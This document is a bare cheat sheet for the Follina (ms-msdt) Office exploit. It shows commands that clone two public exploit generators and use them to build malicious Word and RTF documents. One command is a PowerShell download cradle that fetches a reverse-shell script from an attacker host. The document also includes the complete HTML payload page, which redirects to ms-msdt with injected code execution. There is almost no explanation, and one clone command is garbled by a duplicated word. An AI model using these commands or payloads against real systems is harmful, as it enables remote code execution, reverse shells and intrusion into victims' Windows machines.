## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
## ------------------| chvancooten
git clone git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
